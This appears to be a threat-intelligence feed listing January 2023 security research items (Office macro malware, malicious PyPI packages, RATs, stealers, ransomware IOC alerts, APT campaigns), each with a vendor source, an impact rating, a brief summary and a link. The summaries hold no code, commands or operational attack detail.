Perception-Point
Intel Name:
Exploitation_by_attackers_to_deliver_malware_with_Microsoft_Office_macros
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Perception Point researchers discussed in their blog the similarity between malicious Microsoft Office macros, which are widely abused by attackers to deliver malware. They described similarity-based detection tactics using real-world samples that were detected in the wild.
Source: https://perception-point.io/blog/malicious-office-macros-detecting-similarity-in-the-wild-2/
2023-01-17
Document_Type_Malware_Targeting_Security_Field_Workers
LOW
Intel Source:
ASEC
Intel Name:
Document_Type_Malware_Targeting_Security_Field_Workers
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
ASEC researchers have observed document-type malware being distributed to workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
Source: https://asec.ahnlab.com/en/45658/
2023-01-17
Other_Threat_Actor_Can_Use_Raspberry_Robin
LOW
Intel Source:
Sekoia
Intel Name:
Other_Threat_Actor_Can_Use_Raspberry_Robin
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Sekoia researchers have identified that Raspberry Robin's attack infrastructure makes it possible for other threat actors to repurpose the infections for their own malicious activities, which makes it an even more potent threat.
Source: https://blog.sekoia.io/raspberry-robins-botnet-second-life/
2023-01-17
A_Deep_Analysis_of_CircleCI_Security_Alert
LOW
Intel Source:
CircleCI
Intel Name:
A_Deep_Analysis_of_CircleCI_Security_Alert
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
CircleCI received an alert about suspicious GitHub OAuth activity and analyzed it.
Source: https://circleci.com/blog/jan-4-2023-incident-report/
2023-01-17
Three_PyPI_Package_Spreading_Malware_to_Developer_Systems
MEDIUM
Intel Source:
Fortinet
Intel Name:
Three_PyPI_Package_Spreading_Malware_to_Developer_Systems
Date of Scan:
2023-01-17
Impact:
MEDIUM
Summary:
Fortinet researchers have identified that a threat actor named Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems.
Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps
2023-01-17
Hackers_Using_Middle_Eastern_Geopolitical_Themed_to_Distribute_NjRAT
LOW
Intel Source:
TrendMicro
Intel Name:
Hackers_Using_Middle_Eastern_Geopolitical_Themed_to_Distribute_NjRAT
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Researchers from TrendMicro have identified an active campaign that is using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa. In this campaign, the threat actor Earth Bogle uses public cloud storage services such as files.fm and failiem.lv to host malware, while compromised web servers distribute NjRAT.
Source: https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html
2023-01-15
Vidar_Stealer_Attack_Campaign_impersonating_AnyDesk
LOW
Intel Source:
Crep1x
Intel Name:
Vidar_Stealer_Attack_Campaign_impersonating_AnyDesk
Date of Scan:
2023-01-15
Impact:
LOW
Summary:
A typosquatting campaign found in the wild impersonates multiple legitimate RMM tools and redirects users to fake AnyDesk websites, triggering a Vidar Stealer payload download through Dropbox.
Source: https://twitter.com/crep1x/status/1612199364805660673
2023-01-14
PurpleUrchin_Campaign_Bypass_CAPTCHA_and_Steals_Cloud_Platform_Resources
LOW
Intel Source:
PaloAlto
Intel Name:
PurpleUrchin_Campaign_Bypass_CAPTCHA_and_Steals_Cloud_Platform_Resources
Date of Scan:
2023-01-14
Impact:
LOW
Summary:
Researchers from PaloAlto have analyzed Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.
Source: https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/
2023-01-14
Rhadamanthys_Stealer_Leverages_Google_Ads_in_the_wild
LOW
Intel Source:
Cyble
Intel Name:
Rhadamanthys_Stealer_Leverages_Google_Ads_in_the_wild
Date of Scan:
2023-01-14
Impact:
LOW
Summary:
Researchers from Cyble found a new malware strain, Rhadamanthys Stealer, that leverages spam and phishing campaigns through Google Ads to redirect users to fake phishing websites for popular software. The malware, downloaded in the background alongside legitimate files or through obfuscated images, steals sensitive information to further aid unauthorized access.
Source: https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
2023-01-14
Gootloader_Malware_returns_with_revamped_infection_technique
LOW
Intel Source:
eSentire
Intel Name:
Gootloader_Malware_returns_with_revamped_infection_technique
Date of Scan:
2023-01-14
Impact:
LOW
Summary:
Researchers from eSentire found Gootloader malware activity with a new infection technique that leads to Cobalt Strike, leveraging an existing PowerShell process that beaconed to various malicious domains. The attacker appears to be hands-on-keyboard, dropping multiple payloads, including BloodHound and PsExec, while maintaining persistence and targeting different areas for further compromise.
Source: https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity
2023-01-13
Orcus_RAT_being_distributed_on_file_sharing_sites
LOW
Intel Source:
ASEC
Intel Name:
Orcus_RAT_being_distributed_on_file_sharing_sites
Date of Scan:
2023-01-13
Impact:
LOW
Summary:
The ASEC analysis team recently identified Orcus RAT being distributed on file-sharing sites disguised as a cracked version of Hangul Word Processor.
Source: https://asec.ahnlab.com/en/45462/
2023-01-13
RAT_Malware_Campaign_Using_Polyglot_Files_to_Evade_Detection
LOW
Intel Source:
Deep Instinct
Intel Name:
RAT_Malware_Campaign_Using_Polyglot_Files_to_Evade_Detection
Date of Scan:
2023-01-13
Impact:
LOW
Summary:
Deep Instinct researchers have identified that operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools.
Source: https://www.deepinstinct.com/blog/malicious-jars-and-polyglot-files-who-do-you-think-you-jar
2023-01-13
Spike_in_Holiday_Attacks_Targeting_Ancient_Vulnerabilities_and_Hidden_Webshells
LOW
Intel Source:
Wordfence
Intel Name:
Spike_in_Holiday_Attacks_Targeting_Ancient_Vulnerabilities_and_Hidden_Webshells
Date of Scan:
2023-01-13
Impact:
LOW
Summary:
Researchers from Wordfence have observed spikes in attack traffic over the Christmas and New Year holidays, specifically targeting the Downloads Manager plugin by Giulio Ganci.
Source: https://www.wordfence.com/blog/2023/01/holiday-attack-spikes-target-ancient-vulnerabilities-and-hidden-webshells/
2023-01-13
Research_on_HIVE_Ransomware_attacks
MEDIUM
Intel Source:
Rapid7
Intel Name:
Research_on_HIVE_Ransomware_attacks
Date of Scan:
2023-01-13
Impact:
MEDIUM
Summary:
Rapid7 monitors and researches the range of techniques that threat actors use to conduct malicious activity. Recently, Rapid7 observed a threat actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to drop the victim's defenses, inhibit monitoring, disable networking, and allow time for the ransomware to finish encrypting files.
Source: https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/
2023-01-13
The_Deep_Investigation_of_FortiOS_Zero_Day_Attack
LOW
Intel Source:
Fortinet
Intel Name:
The_Deep_Investigation_of_FortiOS_Zero_Day_Attack
Date of Scan:
2023-01-13
Impact:
LOW
Summary:
Researchers from Fortinet have analyzed the zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month; it was exploited by unknown actors in attacks targeting governments and other large organizations.
Source: https://www.fortinet.com/blog/psirt-blogs/analysis-of-fg-ir-22-398-fortios-heap-based-buffer-overflow-in-sslvpnd
2023-01-13
Unpatched_Vulnerability_to_Bypass_Windows_OS_Security_Feature
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
Unpatched_Vulnerability_to_Bypass_Windows_OS_Security_Feature
Date of Scan:
2023-01-13
Impact:
MEDIUM
Summary:
EclecticIQ analysts researched QakBot phishing campaigns that use a zero-day vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.
Source: https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature
2023-01-12
The_Examination_of_NeedleDropper_Malware
LOW
Intel Source:
Avast
Intel Name:
The_Examination_of_NeedleDropper_Malware
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
Avast researchers have analyzed the NeedleDropper malware, a self-extracting archive that contains a modified AutoIt interpreter, an obfuscated AutoIt script, and a Visual Basic script that is used for initial execution.
Source: https://decoded.avast.io/threatresearch/needledropper/
2023-01-12
Diving_Deep_into_IcedID_Malware
LOW
Intel Source:
Cybereason
Intel Name:
Diving_Deep_into_IcedID_Malware
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
Cybereason researchers have analyzed an IcedID infection that illustrates the tactics, techniques, and procedures (TTPs) used in a recent campaign. IcedID, also known as BokBot, is traditionally a banking trojan used to steal financial information from its victims.
Source: https://www.cybereason.com/blog/threat-analysis-from-icedid-to-domain-compromise
2023-01-12
Active_IOCs_of_Mirai_Botnet_aka_Katana
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Mirai_Botnet_aka_Katana
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Mirai Botnet aka Katana. Mirai is one of the first major botnets to target Linux-based vulnerable networking devices. It was discovered in August 2016 and its name means “future” in Japanese.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-mirai-botnet-aka-katana-active-iocs-4
2023-01-12
Hackers_From_Scattered_Spider_Using_Old_Intel_Driver_to_Bypass_Security
MEDIUM
Intel Source:
CrowdStrike
Intel Name:
Hackers_From_Scattered_Spider_Using_Old_Intel_Driver_to_Bypass_Security
Date of Scan:
2023-01-12
Impact:
MEDIUM
Summary:
CrowdStrike researchers have identified a financially motivated threat actor named Scattered Spider and observed it attempting to deploy Intel Ethernet diagnostics drivers in a BYOVD (Bring Your Own Vulnerable Driver) attack to evade detection by EDR (Endpoint Detection and Response) security products.
Source: https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/
2023-01-12
Dark_Pink_APT_Group_Targeting_Asia_Pacific_Region
MEDIUM
Intel Source:
Group-IB
Intel Name:
Dark_Pink_APT_Group_Targeting_Asia_Pacific_Region
Date of Scan:
2023-01-12
Impact:
MEDIUM
Summary:
Group-IB researchers have identified a new wave of attacks that have struck the Asia-Pacific (APAC) region by the Dark Pink APT group.
Source: https://blog.group-ib.com/dark-pink-apt
2023-01-12
Ransomware_variants_across_the_OSINT_community
MEDIUM
Intel Source:
Fortinet
Intel Name:
Ransomware_variants_across_the_OSINT_community
Date of Scan:
2023-01-12
Impact:
MEDIUM
Summary:
FortiGuard Labs gathers data weekly on ransomware variants that have been gaining traction in their datasets and across the OSINT community. They shared their ransomware report, which provides insights into the ransomware landscape and the Fortinet solutions that protect against those variants.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-monti-blackhunt-and-more
2023-01-12
A_Deep_Dive_into_EyeSpy_Spyware
LOW
Intel Source:
Bitdefender
Intel Name:
A_Deep_Dive_into_EyeSpy_Spyware
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
Researchers from Bitdefender have analyzed spyware named EyeSpy, which is marketed as a legitimate monitoring application, arrives on the system via trojanized installers, and targets Iranian users trying to download VPN solutions to bypass Internet restrictions in their country.
Source: https://www.bitdefender.com/files/News/CaseStudies/study/427/Bitdefender-PR-Whitepaper-EyeSpyVPN-creat625-en-EN.pdf
2023-01-12
Active_IOCs_of_DanaBot_Trojan
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_DanaBot_Trojan
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of the DanaBot Trojan. DanaBot is a persistent and ever-evolving threat that has been circulating in the wild since 2018; it was originally marketed as a Malware-as-a-Service (MaaS) offering that primarily targeted banking fraud and data theft.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-danabot-trojan-active-iocs-45
2023-01-12
Gootkit_Loader_Campaign_Targeting_Australian_Healthcare_Industry
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Gootkit_Loader_Campaign_Targeting_Australian_Healthcare_Industry
Date of Scan:
2023-01-12
Impact:
MEDIUM
Summary:
Researchers from TrendMicro have analyzed a series of attacks and discovered that Gootkit is leveraging SEO poisoning for its initial access and abusing legitimate tools such as VLC Media Player.
Source: https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html
2023-01-12
ASEC_Weekly_Phishing_Email_sample_analyses_Dec_24_31_2022
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_sample_analyses_Dec_24_31_2022
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 24th, 2022 to December 31st, 2022 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/45442/
2023-01-12
ASEC_Weekly_Phishing_Email_sample_analyses
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_sample_analyses
Date of Scan:
2023-01-12
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 18th, 2022 to December 24th, 2022 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/45237/
2023-01-12
NoName057_16_Hacking_Group_Targeting_NATO
MEDIUM
Intel Source:
SentinelOne
Intel Name:
NoName057_16_Hacking_Group_Targeting_NATO
Date of Scan:
2023-01-12
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have observed that the pro-Russian hacking group NoName057(16) is targeting the websites of Czech presidential election candidates.
Source: https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/
2023-01-11
Emotet_Malware_resurfaces_deploying_loaders_through_Spear_Phishing
MEDIUM
Intel Source:
Intrinsec
Intel Name:
Emotet_Malware_resurfaces_deploying_loaders_through_Spear_Phishing
Date of Scan:
2023-01-11
Impact:
MEDIUM
Summary:
Researchers from Intrinsec uncovered Emotet's latest spam campaign spreading malicious documents in the wild, in addition to targeted spear-phishing emails. The malware returns with new obfuscation techniques and revamped loader capabilities.
Source: https://www.intrinsec.com/emotet-returns-and-deploys-loaders/
2023-01-11
Magecart_Skimmer_Using_MRSNIFFA_Toolkit
LOW
Intel Source:
Malwarebytes
Intel Name:
Magecart_Skimmer_Using_MRSNIFFA_Toolkit
Date of Scan:
2023-01-11
Impact:
LOW
Summary:
Malwarebytes Labs researchers have identified a Magecart skimmer using the mr.SNIFFA toolkit and infrastructure from DDoS-Guard. The domain names used to serve the skimmer referenced public figures or names well-known in the cryptocurrency world.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/01/crypto-inspired-magecart-skimmer-surfaces-via-digital-crime-haven
2023-01-11
A_Novel_Info_Stealer_RAT_leveraging_PYPI
LOW
Intel Source:
Phylum
Intel Name:
A_Novel_Info_Stealer_RAT_leveraging_PYPI
Date of Scan:
2023-01-11
Impact:
LOW
Summary:
Phylum researchers have identified a novel malware campaign targeting the Python Package Index (PyPI): a combination of RAT and stealer that exfiltrates various data while maintaining persistence and opening tunnels. The RAT being spread has a web GUI, reflecting the continued focus on supply chain attacks.
Source: https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
2023-01-11
Dridex_Malware_Returns_and_Targeting_MacOS
LOW
Intel Source:
TrendMicro
Intel Name:
Dridex_Malware_Returns_and_Targeting_MacOS
Date of Scan:
2023-01-11
Impact:
LOW
Summary:
TrendMicro researchers have analyzed Dridex, an online banking malware variant targeting MacOS platforms with a new technique to deliver documents embedded with malicious macros to users.
Source: https://www.trendmicro.com/en_us/research/23/a/-dridex-targets-macos-using-new-entry-method.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/-dridex-returns-targets-macos-using-new-entry-method/iocs-dridex-returns-targets-macos-using-new-entry-method.txt
2023-01-10
Russian_Turla_Cyberspies_via_USB_Delivered_Malware
LOW
Intel Source:
Mandiant
Intel Name:
Russian_Turla_Cyberspies_via_USB_Delivered_Malware
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
The Russian state-sponsored threat actor Turla recently launched attacks against Ukraine that leveraged Andromeda malware, most likely deployed by other hackers via an infected USB drive, Mandiant reported. Mandiant researchers analyzed a suspected Turla operation tracked as UNC4210 and discovered that at least three expired Andromeda command and control (C&C) domains had been re-registered and used for victim profiling.
Source: https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
2023-01-10
DShield_Sensor_JSON_Log_Analysis
LOW
Intel Source:
ISC.SANS
Intel Name:
DShield_Sensor_JSON_Log_Analysis
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
Researchers from SANS have analyzed JSON-formatted DShield sensor logs covering a 9-day period.
Source: https://isc.sans.edu/diary/rss/29412
2023-01-10
Drug_trafficking_and_illegal_pharmacies_compete_on_the_dark_web
MEDIUM
Intel Source:
Resecurity
Intel Name:
Drug_trafficking_and_illegal_pharmacies_compete_on_the_dark_web
Date of Scan:
2023-01-10
Impact:
MEDIUM
Summary:
Researchers from Resecurity have identified that the top 10 marketplaces are currently representing the core ecosystem of drug trafficking in the Dark Web, which is split between actors from multiple regions and influence groups.
Source: https://resecurity.com/blog/article/dark-web-markets-compete-drug-trafficking-illegal-pharmacy-monopoly
2023-01-10
The_Detailed_Examination_of_Ursnif_Malware
LOW
Intel Source:
DFIR Report
Intel Name:
The_Detailed_Examination_of_Ursnif_Malware
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
Researchers from The DFIR Report have analyzed the Ursnif malware. The campaign delivers a malicious ISO to users.
Source: https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
2023-01-10
LummaC2_Stealer_Targeting_Chromium_and_Mozilla_Based_Browsers
LOW
Intel Source:
Cyble
Intel Name:
LummaC2_Stealer_Targeting_Chromium_and_Mozilla_Based_Browsers
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
Cyble researchers have discovered a post on a cybercrime forum about an information stealer named LummaC2 Stealer that targets both Chromium- and Mozilla-based browsers.
Source: https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/
2023-01-10
Bluebottle_Campaign_Hits_Banks_With_Signed_Malware
LOW
Intel Source:
Symantec
Intel Name:
Bluebottle_Campaign_Hits_Banks_With_Signed_Malware
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
Researchers from Symantec have identified a Bluebottle campaign hitting banks in French-speaking countries in Africa with activity that leverages new TTPs.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa
2023-01-10
The_modified_CIA_attack_kit_Hive_enters_the_field_of_black_and_gray_production
LOW
Intel Source:
360Netlab
Intel Name:
The_modified_CIA_attack_kit_Hive_enters_the_field_of_black_and_gray_production
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
360Netlab researchers have observed xdr33, a backdoor born out of the CIA Hive project. Its main purpose is to collect sensitive information and provide a foothold for subsequent intrusions.
Source: https://blog.netlab.360.com/warning-hive-variant-xdr33-is-coming_cn/
2023-01-10
InfoStealer_Targeting_Italian_Region
LOW
Intel Source:
Uptycs
Intel Name:
InfoStealer_Targeting_Italian_Region
Date of Scan:
2023-01-10
Impact:
LOW
Summary:
Researchers from Uptycs have observed a new infostealer malware attack campaign. In it, the threat actors delivered spam or phishing emails with the subject “Invoice”, specifically targeting Italy.
Source: https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/
2023-01-10
Active_IOCs_of_Agent_Tesla_Malware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Agent_Tesla_Malware
Date of Scan:
2023-01-10
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of Agent Tesla malware. Agent Tesla is a very popular spyware Trojan built for the .NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analysis programs and anti-virus applications.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
2023-01-09
Hackers_Targeting_Zoom_Application
MEDIUM
Intel Source:
Cyble
Intel Name:
Hackers_Targeting_Zoom_Application
Date of Scan:
2023-01-09
Impact:
MEDIUM
Summary:
Cyble researchers have identified a phishing campaign targeting Zoom application software to deliver the IcedID malware. This malware primarily targets businesses and can be used to steal payment information.
Source: https://blog.cyble.com/2023/01/05/zoom-users-at-risk-in-latest-malware-campaign/
2023-01-09
Diving_Deep_into_PyTorch_Dependency_Confusion_Administered_Malware
LOW
Intel Source:
Aqua Blog
Intel Name:
Diving_Deep_into_PyTorch_Dependency_Confusion_Administered_Malware
Date of Scan:
2023-01-09
Impact:
LOW
Summary:
Aquasec researchers have analyzed a dependency confusion attack targeting a dependency of the widely used PyTorch-nightly Python package, which resulted in thousands of individuals downloading a malicious binary that exfiltrated data through DNS.
Source: https://blog.aquasec.com/pytorch-dependency-confusion-administered-malware
2023-01-09
Brazil_Malspam_Pushing_Astaroth
LOW
Intel Source:
ISC.SANS
Intel Name:
Brazil_Malspam_Pushing_Astaroth
Date of Scan:
2023-01-09
Impact:
LOW
Summary:
Researchers from SANS have identified four Portuguese language emails targeting Brazil. These messages are pushing the same type of Astaroth (Guildma) malware.
Source: https://isc.sans.edu/diary/rss/29404
2023-01-06
Blindeagle_Targeting_Ecuador_Based_Organizations
LOW
Intel Source:
Checkpoint
Intel Name:
Blindeagle_Targeting_Ecuador_Based_Organizations
Date of Scan:
2023-01-06
Impact:
LOW
Summary:
Researchers from Checkpoint have identified a campaign that is targeting Ecuador-based organizations; CPR detected a new infection chain that involves a more advanced toolset.
Source: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/
2023-01-06
Active_IOCs_of_Amadey_Botnet
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Amadey_Botnet
Date of Scan:
2023-01-06
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of the Amadey botnet. Amadey infects a victim’s computer and incorporates it into a botnet. The Amadey trojan can also download additional malware and exfiltrate user information to a command and control (C2) server.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-amadey-botnet-active-iocs-21
2023-01-06
PatchWork_APT_Group_Targeting_Pakistan
MEDIUM
Intel Source:
Rewterz
Intel Name:
PatchWork_APT_Group_Targeting_Pakistan
Date of Scan:
2023-01-06
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of the PatchWork APT group. The Indian threat actor Patchwork has been active since December 2015 and has recently been using spear phishing to strike Pakistan. PatchWork (also known as Mahabusa, White Elephant, hangOver, VICEROY TIGER, and The Dropping Elephant) is an APT that mainly conducts cyber-espionage activities against its targets.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-patchwork-apt-group-targeting-pakistan-active-iocs-4
2023-01-05
Active_IOCs_of_DarkCrystal_RAT_(DCRat)
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_DarkCrystal_RAT_(DCRat)
Date of Scan:
2023-01-05
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of DarkCrystal RAT. DCRat is a Russian backdoor that was initially introduced in 2018. The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkcrystal-rat-dcrat-active-iocs-21
2023-01-05
Active_IOCs_of_SmokeLoader_Malware
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_SmokeLoader_Malware
Date of Scan:
2023-01-05
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of SmokeLoader malware. This malware is mostly used to load additional malicious software, which is often obtained from a third-party source. SmokeLoader can load its own modules, allowing it to perform several activities without the use of additional components.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-smokeloader-malware-active-iocs-55
2023-01-05
Active_IOCs_of_Ursnif_Banking_Trojan
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Ursnif_Banking_Trojan
Date of Scan:
2023-01-05
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of the Ursnif banking Trojan. Attackers have switched to using Trojans such as Ursnif to steal other types of data, including email configurations, as well as credentials and passwords stored in web browsers and even digital wallets. Threat actors use different techniques, such as phishing emails, to lure victims into their trap.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-43
2023-01-05
Active_IOCs_of_CrySIS_aka_Dharma_Ransomware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_CrySIS_aka_Dharma_Ransomware
Date of Scan:
2023-01-05
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of CrySIS aka Dharma Ransomware. CrySIS, also known as Dharma, is a group of ransomware that has been active since 2016. Researchers indicate the spam emails attempt to disguise themselves as invoice emails. In reality, the spam is being used to infect users with the Ursnif keylogger or the Dharma ransomware.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-crysis-aka-dharma-ransomware-active-iocs-2
2023-01-05
Active_IOCs_of_DarkCrystal_Agent_Tesla_Malware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_DarkCrystal_Agent_Tesla_Malware
Date of Scan:
2023-01-05
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of Agent Tesla malware. Agent Tesla is a very popular spyware Trojan built for the .NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analysis programs and anti-virus applications.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
2023-01-05
Installing_CoinMiner_by_malware
LOW
Intel Source:
ASEC
Intel Name:
Installing_CoinMiner_by_malware
Date of Scan:
2023-01-05
Impact:
LOW
Summary:
The ASEC analysis team observed new Linux malware developed with the Shell Script Compiler (Shc) that has been installing a CoinMiner. It is believed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware was installed on the target system. Among those installed were the Shc downloader, the XMRig CoinMiner installed through it, and a DDoS IRC bot developed in Perl.
Source: https://asec.ahnlab.com/en/45182/
2023-01-04
Active_IOCs_of_Cobalt_Strike_Malware
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Cobalt_Strike_Malware
Date of Scan:
2023-01-04
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Cobalt Strike Malware. Cobalt Strike lets the attacker install a ‘Beacon’ agent on the target PC which provides the attacker with a plethora of capabilities, including command execution, file transfer, keylogging, mimikatz, port scanning, and privilege escalation.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-cobalt-strike-malware-active-iocs-40
2023-01-04
Active_IOCs_of_RedLine_Stealer_Ransomware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_RedLine_Stealer_Ransomware
Date of Scan:
2023-01-04
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of RedLine Stealer. This malware first appeared in March 2020. RedLine expanded throughout several nations during the COVID-19 epidemic and is still active today.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-redline-stealer-active-iocs-69
2023-01-04
Active_IOCs_of_Qakbot_(Qbot)_Malware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Qakbot_(Qbot)_Malware
Date of Scan:
2023-01-04
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of Qakbot (Qbot) Malware. QakBot is a banking Trojan that steals financial data from infected systems and a loader that uses C2 servers for payload targeting and download.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-52
2023-01-04
The_infection_of_WordPress_based_websites
LOW
Intel Source:
DrWeb
Intel Name:
The_infection_of_WordPress_based_websites
Date of Scan:
2023-01-04
Impact:
LOW
Summary:
Researchers from Doctor Web found a malicious Linux program that is capable of hacking websites based on the WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform, and injects malicious JavaScript into websites that run outdated versions of such add-ons lacking crucial fixes.
Source: https://news.drweb.com/show/?i=14646&lng=en&c=23
2023-01-04
Active_IOCs_of_LockBit_Ransomware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_LockBit_Ransomware
Date of Scan:
2023-01-04
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of LockBit Ransomware. LockBit attacks leave few traces for forensic analysis as the malware loads into the system memory, with logs and supporting files removed upon execution.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-ransomware-active-iocs-11
2023-01-04
Active_IOCs_of_DarkyLock_Ransomware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_DarkyLock_Ransomware
Date of Scan:
2023-01-04
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of DarkyLock Ransomware. The ransomware attacks all commonly used file formats, including media, documents, databases, and archive files.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkylock-ransomware-active-iocs
2023-01-04
The_Insurance_&_Financial_Institutes_In_Europe_are_targeted_by_Raspberry_Robin
LOW
Intel Source:
Security Joes
Intel Name:
The_Insurance_&_Financial_Institutes_In_Europe_are_targeted_by_Raspberry_Robin
Date of Scan:
2023-01-04
Impact:
LOW
Summary:
Threat researchers from Security Joes observed and responded to two attacks this month that used a framework called Raspberry Robin.
Source: https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
2022-12-30
Hackers_Abusing_Google_AdWords
LOW
Intel Source:
Guardio
Intel Name:
Hackers_Abusing_Google_AdWords
Date of Scan:
2022-12-30
